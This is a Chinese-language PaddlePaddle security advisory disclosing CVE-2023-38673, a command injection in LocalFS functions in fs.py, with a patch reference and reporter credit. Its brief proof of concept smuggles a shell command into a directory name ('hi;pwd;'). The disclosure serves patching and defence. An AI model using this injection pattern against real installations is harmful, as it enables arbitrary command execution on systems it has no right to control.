## PDSA-2023-005: Command injection in fs.py

### CVE编号

CVE-2023-38673

### 影响

fs.py中的功能函数存在命令注入，可以执行任意命令，PoC代码如下：

```python
from paddle.distributed.fleet.utils import LocalFS

client = LocalFS()
client.mkdirs("hi;pwd;")
```

### 补丁

我们在commit [2bfe358043096fdba9e2a4cf0f5740102b37fd8f](https://github.com/PaddlePaddle/Paddle/commit/2bfe358043096fdba9e2a4cf0f5740102b37fd8f)中对此问题进行了补丁。
修复将包含在飞桨2.5.0版本当中。

### 更多信息

请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息，以及如何与我们联系问题。

### 贡献者

此漏洞由 Xiaochen Guo from Huazhong University of Science and Technology 提交。